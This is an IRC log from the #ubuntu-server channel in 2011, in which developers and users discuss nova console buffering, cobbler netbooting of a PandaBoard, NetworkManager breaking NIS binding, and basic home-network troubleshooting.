<rbasak> smoser: no, but any sensible eventing framework woiuld support it, eg. a select or poll loop
<rbasak> smoser: I don't know eventlet though
<zul> nova is suppose to be getting an event based framework but not what you guys are talking about
<rbasak> I suppose I need to study the code more, and do whatever the rest of the code does when it wants to listen for events on a fd
<rbasak> (assuming it is capable of that
<rbasak> )
<Daviey> smoser: ideally qemu would provide a ringbuffer interface, i think - that get_console could poll and flush to file, and append fresh output, keeping the text file at 64K i think.
<Daviey> But a generic solution, seems to be why emlog was invented.  Just a kicker the author didn't seem to try and get it mainlined.
<Daviey> it is starting to taste like getting emlog-dkms into the archive might be less pain.. but hardly fair as an upsteam solution.
<rbasak> I'd prefer a generic solution in userspace
<rbasak> libringbuffer
<Daviey> Anyway, lets see what rbasak churns out :)
<rbasak> trouble about putting ringbuffer support in qemu is that support would be needed all the way through the stack
<rbasak> libvirt would need to support that option
<rbasak> nova would need to ask for it
<rbasak> etc
<Daviey> ture
<rbasak> the fifo answer is really a hack which is useful because qemu happens to be able to write to it without* issues
<rbasak> also with qemu writing to the ringbuffer and nova get_console_output reading from it, there would have to be a standard ringbuffer format and there isn't an obvious file-based one, hence the need for a libringbuffer
<rbasak> that's the ideal solution but I don't think the time it would take can be justified
<Daviey> yah
<rbasak> (also I'd want to have agreement from upstream)
<soren> rbasak: You can just spawn a thread that reads from that fifo, really.
<soren> rbasak: In a tight loop.
<rbasak> soren: that's really horrible but I suppose I'll do it if I have to. I'll need a lock on the ringbuffer then too :-/
<soren> rbasak: You will anyway?
<rbasak> soren: maybe. I haven't looked at eventlet, remember? And you said to ignore its presence, and nobody told me that it used threads :)
<Daviey> rbasak: interesting, http://laforge.gnumonks.org/weblog/2004/08/18/#20040818-syslog-performance
<soren> rbasak: It doesn't.
<soren> rbasak: :)
<soren> rbasak: Well, it uses greenthreads.
<rbasak> Daviey: yeah that's the kind of thing I have in mind for the ideal solution
<rbasak> Daviey: I'd use a disk-based format, the library would mmap it and use mutexes
<rbasak> (not really for performance, but just for the shared ringbuffer really)
<smoser> i think the ideal solutoin actually modifies kvm
<smoser> to support this.
<rbasak> smoser: and thus modifies libvirt and nova too?
<smoser> well, yeah.
<smoser> obviously kvm is the right place, its the closest to it.
<smoser> supporting writing content to a ring buffer.
<smoser> no?
<Daviey> smoser: The problem is, there is no such thing as a userspace or mainline kernel generic ringbuffer
<Daviey> If one is provided as named pipe, kvm already supports it :)
<rbasak> well, qemu already supports writing to a socket
<rbasak> and indeed a pair of named pipes
<Daviey> incidently, screen works against connecting to a unix pipe.  I like that.
<rbasak> so if we are always going to have a qemu monitoring process, then I don't think ringbuffer _has_ to be in qemu for the result to be clean
<rbasak> in fact I think it would be reasonable if qemu upstream rejected a ringbuffer patch for this reason
<rbasak> trouble is that I don't think libvirt allows for a monitoring process, and it sits in the middle of our stack
<rbasak> although I suppose it would be reasonable for libvirt to support a socket destination for console logging and to pass that through from nova to qemu
<rbasak> but we're coming back to nova supporting events on a file descriptor again
<soren> It does.
<rbasak> OK so I think the only ugliness really is the fifo without telling qemu
<rbasak> so if we implement as planned (with nova monitoring the fifo better than a poll if possible) and there are issues then that would need to be fixed by actually using qemu's pipe type and modifying libvirt to pass that request through
<soren> Sorry, what?
<soren> Qemu's pipe type is what you'll use as a fallback? What's plan A?
<rbasak> Plan A is using qemu's file type which is actually a fifo
<rbasak> (as in, we make the fifo and then tell qemu to write to it as a file)
<rbasak> I thought that was the plan all along, otherwise how do we do it without modifying libvirt?
<uvirtbot> New bug: #838729 in libcgroup (universe) "x200 laptop fails to complete to suspend on second suspend after boot" [Medium,Triaged] https://launchpad.net/bugs/838729
<ScatterBrain> Is AppArmor worth keeping on a Web Server?
<jpds> ScatterBrain: Possibly.
<jdstrand> ScatterBrain: sure, especially if you are using mysql and/or confine specific applications via http://wiki.apparmor.net/index.php/Mod_apparmor_example
<jdstrand> s/specific/specific web/
 * ScatterBrain looking at link.
<norc_> Ok let me approach this from another angle. I installed a kernel via apt, then moved the ovh kernel and /etc/grub/06_OVH to a temporary dir, hit update-grub and then reboot - this should technically boot directly into the new kernel then right?
<patdk-wk> depends on grub's settings
<zul> lunches
<garymc> I still cant get server to load dhcp3 after server reboot. Any ideas anyone?
<jamespage> RoAkSoAx: around? need a bit of help pxebooting my panda
<RoAkSoAx> jamespage: i'm here
<jamespage> hey RoAkSoAx
<jamespage> I'm trying to get my pandaboard to pxe boot and install using cobbler (oneiric)
<RoAkSoAx> jamespage: ok, where are you stuck?
<jamespage> its booting OK from the sd card - but I got an error trying to add the sysem
<RoAkSoAx> jamespage: pastebinit ;)
<jamespage> <type 'exceptions.IOError'>:[Errno 2] No such file or directory: '/etc/cobbler/pxe/pxesystem_arm.template'
<RoAkSoAx> jamespage: interesting, let me test
<jamespage> RoAkSoAx: the message is right i.e. the file does not exist
<RoAkSoAx> jamespage: alright, so it might just be a packaging error
<RoAkSoAx> let me check
<RoAkSoAx> jamespage: btw.. I think you'll have to trick the preseed to get manual partitioning cause in my case, everything installed successfully however, it failed to come up
<jamespage> RoAkSoAx: right-oh
<jamespage> I was going to try installing to a usb disk to try an improve performance
<RoAkSoAx> jamespage: ok.. anyways I'm building the apckage now
<jamespage> RoAkSoAx: OK - so I hacked in the pxe*_arm.templates from the source pckage
<RoAkSoAx> should be able to get it fixed soon
<jamespage> for the time being
<jamespage> :-)
<jamespage> its doing somehting
<jamespage> installing I think
<jamespage> but nothing on the serial line - maybe I need to set some more kernel options
<RoAkSoAx> jamespage: yes you do
<RoAkSoAx> sudo cobbler system edit --name=balblabla --kopts="blabla" I believe it is
<jamespage> yep - picked then from here http://rsalveti.wordpress.com/2011/07/11/net-booting-with-tftp-and-pxe-with-pandaboard/
<utlemming> smoser: around?
<RoAkSoAx> jamespage: cool, alright, I';ll be uploading the fix in a bit
<RoAkSoAx> forgot to install them in cobbler-common
<jamespage> np
<RoAkSoAx> jamespage: good catch though ;)
<jamespage> I did not need todo your hack with the pxelinux.cfg/* file - that worked fine
<RoAkSoAx> jamespage: yeah they fixed it already AFAIk
<GrueMaster> I am interested in this cobbler for panda pxe boot.  I already have pxeboot working here (quite well, actually), except for doing custom preseeds & custom pxelinux.cfg.
<GrueMaster> (and the occasional issue of not being able to install to the advertently unplugged usb drive - oops).
<uvirtbot> New bug: #844982 in cobbler (universe) "Cobbler lacking arm templates for pxe file generation" [Medium,Fix released] https://launchpad.net/bugs/844982
<jamespage> GrueMaster: I'll let you know how I get on - I want to network install to USB drive so may need a little help there
<GrueMaster> Only real issues I have seen lately are related to bug 806751, and recently something has changed to where it now prompts me for keyboard detection again.
<uvirtbot> Launchpad bug 806751 in debian-installer "Boot partition on SD is too small on omap/omap4" [Medium,New] https://launchpad.net/bugs/806751
<koolhead17> hey all
<sms_> a noob me just installed ubuntu server, is there a tutorial somewhere how I can control the server from my win7 pc?
<sms_> By control I mean see and use the terminal on the win7 pc basically..
<jamespage> sms_: try putty
<sms_> will do
<sms_> oh wow
<sms_> Didn't think it would be this simple
<sms_> Yess :)
<RoAkSoAx> jamespage: how's the installation going?
<jamespage> RoAkSoAx: worked like a dream - had to work my own preseed for install to usb disk
<GrueMaster> jamespage: I could have sent you mine to work from.
<jamespage> well it did not need to much alteration TBH
<jamespage> just fixing the disk to install to
<GrueMaster> I'm curious, can a preseed file use an include statement to pull a sub-section for preseed parameters?
<GrueMaster> (I haven't worked with preseeding that much).
<RoAkSoAx> jamespage: is it booting?
<jamespage> RoAkSoAx: yep
<jamespage> can figure out how to make it netboot again tho
<jamespage> can't that is
<RoAkSoAx> jamespage: did you create the two partitions on the USB stick?
<jamespage> yes
<RoAkSoAx> jamespage: would be could if you could write down your steps so I can play aroudn wtih what you did too
<GrueMaster> jamespage: The easiest way I have found is to reformat the SD and copy /usr/lib/u-boot/omap4_panda/[MLO|u-boot.bin] (in that specific order) to the SD.
<GrueMaster> Then u-boot will look to the bootp server for netboot.scr first.
<ScatterBrain> Ok, really showing my noobness here.  If am installing a LAMP Server (for development purposes) and I'm ONLY going to be talking to MySQL on the local machine (via bash scripts, and PHP), the default setting in /etc/mysql/my.conf to bind to the loopback address is correct, right?
<kirkland> RoAkSoAx: ping
<RoAkSoAx> kirkland: pong
<kirkland> RoAkSoAx: are you getting bzr crashes when running release-build?
<kirkland> RoAkSoAx: looks like something in bzr build-deb broke very recently
<kirkland> lifeless: ^
<RoAkSoAx> kirkland: yes
<kirkland> RoAkSoAx: have you triaged it?
<ScatterBrain> The server will be accesible from the Internet, but I only want commands being sent to MySQL from my web applications and the local backup scripts.
<RoAkSoAx> kirkland: i got it fixed by commenting this:
<RoAkSoAx> kirkland: http://paste.ubuntu.com/685506
<RoAkSoAx> kirkland: lines 54,55
<kirkland> RoAkSoAx: ugh
<kirkland> RoAkSoAx: that sucks
<kirkland> RoAkSoAx: i guess we can sign it later
<kirkland> RoAkSoAx: but i think that's a bug in bzr build-deb
<lifeless> kirkland: hi; tell jelmer / james_w / poolie :P
<lifeless> kirkland: I'm on leave atm
<kirkland> lickalott: thanks
<kirkland> lifeless: ah, right, congrads ;-)
<RoAkSoAx> kirkland: yeah it wont hurt for now
<lifeless> kirkland: thanks :P - if I wasn't about to hop in the car and go pick lynne up (again :P) I would poke at it for you, but I am, so I won't.
<uvirtbot> New bug: #845068 in ipmitool (universe) "ipmitool is not packaged for ARM" [Undecided,New] https://launchpad.net/bugs/845068
<kirkland> lifeless: np, later
<kev009> any opinions on zenoss vs opsview for monitoring?
<jamespage> RoAkSoAx: will document somewhere handy tommorow
<RoAkSoAx> jamespage: thanks
<RoAkSoAx> jamespage: what partiotioning layout did you use?
<lborda> kim0, hi
<kim0> lborda: hey there
<lborda> kim0, I'm filling a merge proposal for the serverguide. Should I add you as a reviewer?
<kim0> lborda: not really, whoever can review will .. I don't like becoming a bottleneck :)
<kim0> lborda: congrats on the great work though
<kim0> lborda: keep em coming
<lborda> kim0, not a problem... it's a pleasure...
<kim0> great thanks!
<RoAkSoAx> jamespage: are you using today's images though?
<sms_> two computers connected to the same router, what featurs must be on in the router so I can ftp into one computer to the other?
<sms_> from the other*
<patdk-lap> how are they connected to the router?
<patdk-lap> using different nics? vlans? ...
<sms_> rj45 cable?
<sms_> I'm pretty confused with this networking stuff
<patdk-lap> the same rj45 cable?
<sms_> No, the router has 4 slots
<patdk-lap> sounds scary
<patdk-lap> what kind of *router* is this?
<sms_> hehe
<sms_> Uhh
<sms_> a-link roadrunner 44
<Pici> Normally you don't need to do anything on a router for two clients under it to communicate.
<sms_> so adsl router? I guess
<patdk-lap> ya, sounds like nothing needs to happen
<patdk-lap> as long as the router is providing dhcp info, or you used static ip's
<Pici> sms_: have you installed an ftp service on the server you'd like to ftp into?
<sms_> I can ftp into my server, but apparently the connection went over the internet
<sms_> So I guess I used the external ip
<sms_> and this is where I'm lost
<Pici> So use the internal IP.
<sms_> Where can I find it
<patdk-lap> on the computer running the ftp server
<sms_> what command?
<patdk-lap> dunno, what os is running on it?
<sms_> ubuntu
<patdk-lap> ifconfig
<sms_> so uhh
<sms_> eth0: info
<sms_> lo: info
<sms_> which one is the internal ip :S
<patdk-lap> all of them :)
<patdk-lap> but your looking for the eth0 one
<sms_> umm
<sms_> inet addr:... is my external ip I think
<sms_> Because I can access it from anywhere..
<patdk-lap> post it
<sms_> 88.115.187.159
<patdk-lap> hmm, odd
<patdk-lap> what ip is on the other machine?
<sms_> 91.155.133.247
<sms_> the one I'm on now
<Pici> weird.
<patdk-lap> both plugged into that same router?
<sms_> yes
<Pici> Those are both publically addressable ips.
<patdk-lap> must have got multichannel from the isp then
<patdk-lap> or whatever they call that on dsl
<sms_> yeah? :D
<sms_> So is it a setting in the router or something
<sms_> I mean
<patdk-lap> you have to have fun with routes to get that to work nicely :)
<sms_> I keep reading 192.168.0.0 from everywhere
<sms_> so I'm guessing that's if I had an internal ip
<patdk-lap> normally that is how it works, but your getting multible connections
<sms_> Wait so
<sms_> My router is in bridged mode?
<patdk-lap> nope
<patdk-lap> or, I don't believe so
<patdk-lap> try this on your machines
<patdk-lap> route add -host 91.155.133.247 dev eth0 (on the server)
<patdk-lap> and, route add -host 88.115.187.159 dev eth0 (on the client)
<patdk-lap> it's been awhile since I have done something like this
<sms_> well the client is win7
<patdk-lap> hmm
<KrayZ> hi all, howto mount the floppy drive on the ubuntu server livecd? I need to load some raid drivers in order to see my raid.. (rocketraid 620)
<sms_> hmm, I can't configure my router without changing my ip to 10.0.0.2, subnet mask 255.255.255.0 and gateway 10.0.0.3
<toddnine> Hi guys.  Does anyone have any experience with either Ubuntu Cloud or a server with virtualization?  I'm looking to replace our old vmware server (still running on cent os 5.0) with an updated ubuntu version.  We're also growing on our internal system needs, so we need the ability to expand as well.
<toddnine> I also need an interface that's relatively easy to use like the vmware server 2.0 web ui.  Any suggestions in the Ubuntu sphere of products since this is our preferred OS now
<koolhead17> toddnine: better you speak to canonical in case you need support :D
<jamespage> RoAkSoAx: this is the preseed I'm using - http://paste.ubuntu.com/685589/
<toddnine> koolhead17: We're not a big shop.  The hosts are all used for development work, so we should be ok for support
<jamespage> and yes I am working from todays images - although I have had to hard power off/on a couple of time
<RoAkSoAx> jamespage: i get a weird error about not finding the root filesystem, but I don't get the partitioner at all
<jamespage> RoAkSoAx: so did you do the 2 partition setup on your sd card?
<koolhead17> RoAkSoAx: even am not able to get custom partitioning working via preseed
<RoAkSoAx> jamespage: yeah, its the same setup as I had installing before
<RoAkSoAx> jamespage: this time it complainst about not finding the root filesystem so might be the installer
<jamespage> so is this ARM or x86?
<jamespage> sorry - its a bit late so brain a little fuddled
<RoAkSoAx> jamespage: ARM
<jamespage> right-oh
<koolhead17> toddnine: i am not aware who all works for canonical here and who can help you with it. :(
<toddnine> koolhead17: Do they have a dedicated channel?
<RoAkSoAx> koolhead17: yeah you cant, but the thing here is that I'm using a rpeseed that is supposed to wipe out the root partition and use it
<RoAkSoAx> and it used to do it
<RoAkSoAx> not anymore
<koolhead17> :(
<koolhead17> pressed is crazy :D
<koolhead17> toddnine: where are you based in
<toddnine> New Zealand
<toddnine> www.spidertracks.com
<koolhead17> toddnine: check pm
<sms_> patdk-lap, my router is in bridged mode..
<GrueMaster> jamespage: Here's my preseed. http://paste.ubuntu.com/685594/  So far it works quite well, although recently I have been getting prompted for keyboard info prior to dchp.
<koolhead17> jamespage: but this should work
<koolhead17> its auto partitining
<koolhead17> i suppose
<koolhead17> ?
<koolhead17> partitioning
<sms_> lan, nat, natp, dhcp I'm just so lost with the relation of these :|
<jamespage> GrueMaster: well I did not get any prompts
<GrueMaster> And my pxelinux.cfg  http://paste.ubuntu.com/685598/
<GrueMaster> Might be a difference in kernel boot params.
<RoAkSoAx> jamespage: yeah what are your kernel boot params
<jamespage> RoAkSoAx: console=ttyO2,115200n8 earlyprintk=ttyO2 locale=en_GB text priority=critical fixrtc omapfb.vram=0:24M vram=48M
<koolhead17> RoAkSoAx: i don`t provide kernel parameter like that. i simply import the ISO and then when am creating profile i provide it with path
<koolhead17> and yes if you are using eth1 as default on dhcp, you have to provide it in kernel options or your profile or system
 * koolhead17 spent 7 days kicking himself with preseed
<koolhead17> Daviey: hey
<jamespage> so I set those kernel params on the profile - but I should prob have done them on the system as they are for serial console access (i,e, specifi)
<RoAkSoAx> jamespage: have the same plus root=/dev/mmcetcetc
<GrueMaster> Guess I can delete the mem= lines.  They are only needed for accelerated encoding.
<jamespage> I dropped root=
<jamespage> as I'm not installing to the SD card but to a USB connected SATA drive
<jamespage> hence the /dev/sda in my preseed
<RoAkSoAx> jamespage: right, I see the failure with both, adding root= or removing it
<RoAkSoAx> jamespage: which I didn't see before
<jamespage> hrm
<RoAkSoAx> jamespage: so if you have the chance to give it a try with a SD card
<RoAkSoAx> let me know your results
<jamespage> I will do
<jamespage> GrueMaster: I just raised bug 845158
<uvirtbot> Launchpad bug 845158 in ubuntu "Frequent java task hang on ARM server" [Undecided,New] https://launchpad.net/bugs/845158
<jamespage> keep bumping into it
<GrueMaster> I don't think netinstall will install properly to SD due to the partitioning.
 * GrueMaster looks
<jamespage> have you seen anything similar in the testing you have been doing?
<GrueMaster> No, but I am only installing the jenkins slave on my systems.
<GrueMaster> Which java are you using?  I have seen issues with openjdk-7-jre-headless.
<jamespage> yeah - I was more poking at any other java based stuff you had been trying?
<jamespage> thats running on openjdk-6
<jamespage> -jre-headless
<GrueMaster> According to https://wiki.ubuntu.com/ARM/QA/Server, Phoronix-test-suite was run against openjdk-6 (if I read this correctly).  It should have found something if there was an issue.
<GrueMaster> Although it was a slightly older version.
<uvirtbot> New bug: #598933 in open-vm-tools (multiverse) "open-vm-tools should recommend open-vm-dkms" [Wishlist,New] https://launchpad.net/bugs/598933
<sms_> well I made progress
<sms_> Now I have internal IP adresses
<sms_> What answers my external ip now?
<sms_> aaaa that's where the "virtual server" thingy in my router comes along
#ubuntu-server 2011-09-09
<uvirtbot> New bug: #845247 in net-snmp (main) "SNMP mibs +all does not work in snmpd.conf" [Undecided,New] https://launchpad.net/bugs/845247
<lickalott> gents is there a better way to hide a file/folder than placing the . infront of it.  There is a shell discrepancy happening and i can't fix it as the incoming user (system) isn't within my control.  Basically...if i log in locally to the box or get to it via the network (NFS or samba) i can't see the folder unless i use the -a.  If the other user logs in via the network they can see it
<lickalott> with a straight ls.  I would like this particular folder to be compeltely hidden from view for any incoming users.
<twb> lickalott: have them run "alias ls"
<twb> They probably have explicitly asked for it to be -a by default
<twb> And no, there is no better way, except possibly for something filesystem-specific (that I'm not aware of).
<lickalott> was afraid of that....   I've seen this before i.e. changing default shell from bash to csh or tcsh.  Bash will require the -a and tcsh will show it regardless.
<twb> Sorry, I don't support csh/tcsh.
<twb> But I think it's probably still an alias, just that e.g. /etc/tcshrc sets it and /etc/bashrc doesn't
<lickalott> on the phone with one of my guys now having him check
<lickalott> thks!
<jmarsden> lickalott: Log it from the network, and (a) check what shell you are running, and then (b) see what     alias ls     outputs.
<twb> You could just, you know, read the rc files
<lickalott> just hung up the phone.  said he "echo $SHELL" on the machine as the local user and it said csh but in etc/passwd is showed bash.  He is accessing it via NFS with the user that i don't want to see the stuff.  Had him vi .cshrc and strip out all aliases and try again.  he's going to call me in a bit.
<twb> IMO best solution is to uninstall csh :-)
<koolhead11> hi all
<makka> I setup Ubuntu Cloud in test environment, and I'm having an SSL issue with the store.  Anyone willing to help with this one:)
<koolhead17> neoXsys: hey
<neoXsys> koolhead17, Pong
<koolhead17> how are you doing?
<uvirtbot> New bug: #845388 in postfix (main) "package postfix 2.8.2-1ubuntu2.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 75" [Undecided,New] https://launchpad.net/bugs/845388
 * Daviey curses Mr Bloom's Nursery.
<lynxman> Daviey: morning sir o/
<Daviey> hey lynxman
<jamespage> Morning all
<jamespage> Daviey: should squid-deb-proxy-client work out of the box for installs of oneiric?
<jamespage> RoAkSoAx, GrueMaster: Notes and a level of automation of what I did yesterday re cobbler/arm/preseeds/sd cards etc...
<jamespage> http://pad.ubuntu.com/arm-server-netboot
<lynxman> jamespage: squid-deb-proxy-client worked so far for me, although your mileage will vary on the server if you don't use private networks, requires further tweaking
<jamespage> lynxman: do I need todo anything special? i.e. include flags in a preseed or suchlike?
<lynxman> jamespage: I did setup with mvo a couple debconf hooks on low prio for exactly that :)
<lynxman> jamespage: although tbh I can't recall the names right now :/
<jamespage> lynxman: hmm - so they seem to be more about setup once installed
<jamespage> I want my installer to use it
<lynxman> jamespage: you can preset the debconf options before installing the package, that's what I did in orchestra v1.0
<dori922> hey! im making a file server for windows clients, what good to get the windows filesystem working with linux file systems? (Clients will be in different companies/locations so Samba isnt suitible cause it wants workgroups)
<lynxman> jamespage: should be easy to do through preseed shouldn't it
<jamespage> lynxman: one would hope so
<lynxman> jamespage: :)
<sgo11> Hi, with default installation of apache2 and ubuntu 11.04 natty. the ubuntu doc says ErrorDocument directive can be found in apache2.conf. But I failed to find it. The default 404 error output is also not from /usr/share/apache2/error/* from what I can see. I tried to grep -ir ErrorDocument under /etc/apache2/. no found. I know I can define this in virtual host config file. but I am just wondering which file defines ErrorDocument in default installation?
<sgo11>  thanks alot.
<just-a-visitor> http://httpd.apache.org/docs/2.0/mod/core.html#errordocument lists 4 options that Apache can be configured to handle Error Documents.  If it is not defined, the default behaviour is to display a hardcoded error page.
<sgo11> just-a-visitor, ok. thanks a lot. I think it displays the hardcoded error page. no wonder I can not find it.
<Daviey> jamespage: It should.. yes.. but a number of people have reported woe
<jamespage> Daviey: not working so well for me either
<Daviey> :(
<Daviey> jamespage: Hmm, do you have squid-deb-proxy server component on your network?
<jamespage> Daviey: yes
<Daviey> advertises itself via avahi
<Daviey> I wonder if avahi doesn't work properly on arm
<jamespage> Daviey: might be - I'll try a x86 install instead
<jamespage> Daviey; hrm - might be a clue - base-installer: warning: /usr/lib/base-installer.d/80squid-deb-proxy-client returned error code 1
<jamespage> Daviey: I had to enable is using early_command
<jamespage> and its still in universe so had to turn that on for udeb as well
<Daviey> oh
<jamespage> guess that might not be right?
<jamespage> it works fine if I install on the server after is been installed
<jamespage> i.e. squid-deb-proxy-client
<Daviey> jamespage: Need to check if it is seeded
<uvirtbot> New bug: #845536 in rabbitmq-server (main) "rabbitmq user showed as being logged in" [Undecided,New] https://launchpad.net/bugs/845536
<uvirtbot> New bug: #845541 in solr (universe) "Remove libcommons-fileupload-java-universe from the Oneiric archive" [Undecided,New] https://launchpad.net/bugs/845541
<zul> morning
<tp43> How do you setup the mail server?
<ikonia> that's quite a wide question
<Blinny> Recently upgraded from 8.04.4 to 10.04.3. I'm experiencing a phenomena where a NIS slave will not bind to an NIS master if network-manager service is started. If I stop the service, suddenly NIS will bind and start. Anyone know the cause of this problem off-hand?
<ikonia> tp43: you need to work out what stlye of mail setup you want, then what software you need/want to do that
<tp43> I am gonna install xmail and see what happens
<ikonia> Blinny: can you bind after you start network manager ?
<Blinny> ikonia: No.
<Pici> tp43: Have you seen https://help.ubuntu.com/10.04/serverguide/C/email-services.html ?
<ikonia> Blinny: does network manage keep the same IP address as when you are not using network manager?
<Blinny> ikonia: Yes.
<ikonia> Blinny: so is network manager set for a static IP ?
<Blinny> ikonia: I can tell no difference in ifconfig or resolv.conf
<Blinny> ikonia: I have not historically used network-manager. However, the IPs of the NICs do not change.
<ikonia> Blinny: is network manager setup to use a static IP - or a dhcp ip
<Blinny> ikonia: I am from the Slackware 1.x world so I don't know much about network manager, just manual configuration using etc/network/interfaces . This is also a headless server so I don't do a lot of app stuff. Where are network manager's config files found?
<ikonia> Blinny: why are you using network manager ?
<Blinny> ikonia: Believe me, I don't want to!
<ikonia> Blinny: if you have put the details in network/interfaces it will conflict with network manager
<tp43> Pici, thx
<ikonia> Blinny: ok, so disable it
<Blinny> ikonia: Brilliant. Can I purge?
<ikonia> Blinny: that's the issue, your probably creating a conflict
<ikonia> Blinny: if you're not wanting to use it, remove/disable it
<Blinny> I do have three other servers that have network-manager but don't have this NIS problem. I had thought I'd shelved/disabled. It's not listed in sysv-rc-conf but the change to upstart probably causing it to become active.
<Blinny> Is network-manager started by udev? What is the preferred method of disabling?
<ikonia> Blinny: is this machine running a desktop by any chance ?
<Blinny> I think upstart uses /etc/init/*.conf files. Ah after dbus.
<Blinny> ikonia: This is a LTSP machine, so yes.
<Blinny> ubuntu-desktop is installed.
<tp43> oooh, I need an mta
<Blinny> tp43: I've had great luck with postfix.
<Blinny> tp43: YMMV
<tp43> Blinny, hmm, I just went with exim4
<Blinny> tp43: A good starting place.
<ikonia> Blinny: ok, so you may want to just disable it on the desktop, that's the easy way
<Blinny> ikonia: At the server console?
<Blinny> ikonia: Since NetworkManager seems to be The New Way To Go, I'm worried about purging it due to future dependencies.
<Blinny> Perhaps my worry is unfounded.
<ikonia> Blinny: why ?
<ikonia> there is no need to worry
<Blinny> So purge it is! I have a few laptops and I've found networkmanager nice for handling wireless but for normal servers, I'll be glad to see it go.
<Blinny> The package is network-manager?
<ikonia> network manager is great for a desktop, I think it's a really useful tool, especially for things such as multiple wireless networks, however if you're setting the info in /etc/network/interfaces, you're creating a conflict, use one or the other
<Blinny> ikonia: Thank you. Cheers mate.
<Blinny> Another NIS question: I have one master and three slave+clients. When the client couldn't bind to the master, it would not answer queries as a slave. I understand this is why a slave setup exists, so I'm assuming I have something wrong in my config. Does this sound right?
<soren> Wow, NIS? I haven't seen a NIS setup in a decade or so.
<Blinny> LDAP gave me nightmares about 6 years ago and I've never recovered. Some day I'll give another crack at 389 Dir. Server.
<Blinny> OK. network-manager removed on 3 servers.
<ikonia> Blinny: it depends if it is "current" in terms of it's maps
<Blinny> Does that require a normal start-up w/ bind, then connection lost? I.E. maps aren't cached across reboot?
<zul> jamespage: ping
<jamespage> hey zul
<zul> jamespage: so you know that bug you opened when running four lxc instances are you using nbd?
<jamespage> zul: maybe - is that something I would have set explicitly? I just installed nova-compute-lxc on an all-in-one install
<zul> no it should just modprobe nbd
<zul> jamespage: and which version are you using as well
<jamespage> of nova?
<jamespage> zul: I've torn down the system now but its was a fresh install on the date I reported the bug
 * jamespage must remember to use ubuntu-bug
<zul> jamespage: okie dokie...im going to roll a new one today once it is in the archive can you retest because im running with -n 2 and i cant reproduce it
<jamespage> zul: OK - will
<jamespage> do
<jamespage> there was something a little odd about the way I setup the system when I saw that issue
<jamespage> I started with nova-compute-kvm
<jamespage> and then switched to nova-compute-lxc
<jamespage> not sure that would make a difference
<zul> jamespage: ah ok...yeah the configuration file is different
<jamespage> zul: well I gave it all a good kick before I tried to start any lxc instances
<jamespage> i.e. rebooted
<Blinny> Using Lucid, openswan fails to start on boot. One must manually do 'service openswan restart' (not start), I believe because of a locking issue, but may be related to using sysvinit rather than upstart. Anyone use openswan for ipsec or know of this issue? I may try to create /etc/init/openswan.conf and change the job to upstart to see if that helps, but this will be my first.
<GrueMaster> jamespage: I'm looking over your pad now.  One thing I noticed is the mac address setting.  Is that required for cobbler?  Also, you shouldn't need to set the omapfb stuff for headless install.
<jamespage> GrueMaster: so cobbler uses it to set a specific netboot install target for the server - rather than picking up the generic netboot menu including x86 stuff
<GrueMaster> Ah.
<GrueMaster> I haven't used cobbler, so didn't know.
<jamespage> GrueMaster: if you can give me a better set of kernel options for the headless install much appreciated - I think I got those from here:
<jamespage> zul: I just setup my lxc nova all-in-one
<jamespage> when I terminate my lxc instances I get a load of qemu-nbd processes hanging around for them - which does not look right to me
<zul> jamespage: known bug...i have a branch that fixes it
<jamespage> zul: coolio
<zul> yay collectd-server ensemble fomula works
<zul> now for the web part
<cjwatson> GrueMaster: (from a few days back) I might just be getting old, but I don't remember mentioning an IPv6 test suite at all - are you sure that was me?
<cjwatson> GrueMaster: unless it was the tunnelbroker.net certification program
<GrueMaster> cjwatson: I never suggested that it was you.  Others did.
<GrueMaster> The only thing I have seen for full ipv6 testing is from http://tahi.org, but it is software written for BSD.
<GrueMaster> Other than that, there are web sites that will check your ipv6 connectivity, but I feel that isn't enough to check the entire stack (dhcp6, dns6, etc).
<cjwatson> ah, ok, well, I was replying to:
<cjwatson> 19:19 <GrueMaster> cjwatson: Ping.  Do you remember the name of the IPv6 test suite you mentioned at UDS?
<GrueMaster> I was told in other channels that you had said something.
<cjwatson> GrueMaster: you should probably talk with stgraber if you aren't already, as he's working on some things along those lines
<GrueMaster> Might be easier just to send an email to ubuntu-dev or warthogs.  I don't have time to bounce from one dev to another like this.
<GrueMaster> ( I think you were the third person I was pointed to).
<dori922> is rssh still good to use to allow FTP and block SSH?
<patdk-wk> allow sftp?
<TheEvilPhoenix> ^
<hggdh> Daviey: the dialog on -devel between CJ and CR may interest you folks
<hggdh> Daviey: basically, a chance of finding oneself with a server that does not pxe-boot on default is probably resolved
<rDx3> I'd like to understand why my init.d program (thin) start successfully from the console but not at boot time. Any clues to help me on that?
<uvirtbot> New bug: #845764 in libvirt (main) "continuous respawning of libvirt-bin with LXC/ARM/nova-compute" [Undecided,New] https://launchpad.net/bugs/845764
<jamespage> \o/
<jmarsden> rDx3: $PATH may not be the same.  In general, the environment will be different, but $PATH is probably the most likely cause.
<jamespage> zul: ^^ this rings a bell with something you saw during the openstack sprint
<rDx3> thank jmarsden, do you mean the path in the init.d file? I think it was created directly from thin server. how do I check that?
<lajjr> kim0 are you online??
<kim0> lajjr: yes I am
<lajjr> great!
<lajjr> I have a ??
<jmarsden> rDx3: I can't walk you through troubleshooting a script right now, no time.  you can echo $PATH to see what the value of PATH is.
<kim0> lajjr: shoot :)
<jmarsden> rDx3: I'm about to leave for work...
<rDx3> jmarsden: ok thanks
<lajjr> I completed the security ones and there are done..
<kim0> lajjr: you are awesome :)
<lajjr> On the next ones can I combine those chapters as one for a view, they will still be separate. in real form in guide just in the review branch??
<kim0> lajjr: It's probably best to keep a review per chapter (not sub-chapter) .. Having one review include two full chapters might not be a good idea, since the reviewer might not be confident on both topics
<lajjr> OK great just checking I made a chapter 13 branch and a 14 branch just have to push in a little bit..
<kim0> lajjr: awesome :) keep me coming .. Thanks man, it's really appreciated
<lajjr> kim0,  I got them and they are separate, just didn't want to make a mistake by putting them together.
 * kim0 nods
<lajjr> np Thank You kim0
<zul> jamespage: werid
<jamespage> zul: potential regression?
<zul> jamespage: could be i would have to double check
<rDx3> how do I know under witch user a startup script is run?
<jamespage> morning SpamapS
<jamespage> SpamapS: zookeeper in Debian now contains the Ubuntu changes you made - do you want to re-sync as general housekeeping or leave it until next release?
<SpamapS> jamespage: let it sync next release. :)
<SpamapS> jamespage: but thanks for the heads up :)
<jamespage> SpamapS: that was my thinking to :-)
<jamespage> np
<Daviey> hggdh: nice
<zul> jamespage: effing
<jamespage> zul: same thing or something new?
<zul> same thing
<jamespage> bah
<zul> im going to go nuts
